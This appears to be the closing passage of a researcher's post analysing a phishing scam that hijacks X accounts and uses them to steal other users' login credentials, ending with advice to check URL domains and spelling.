    Infiltration of the actor behind this scam will take an actual chat with the user and sending my own phishing link.

    Overall it is a very effective phishing method: compromise X accounts via social engineering and then use that account to phish others. Not sure of the scammer’s end game. Maybe to get to a “big fish” account in order to extort money from the account owner to get it back? I’m not sure. In this instance, the scammer just overlaid the phishing page with a real X login page to mimic it. But in reality the hacker is capturing credentials in a MITM attack.

    Compromising gold checkmark accounts is a very easy way to get to someone. Always check for weird URL domains and for incorrect grammar/spelling.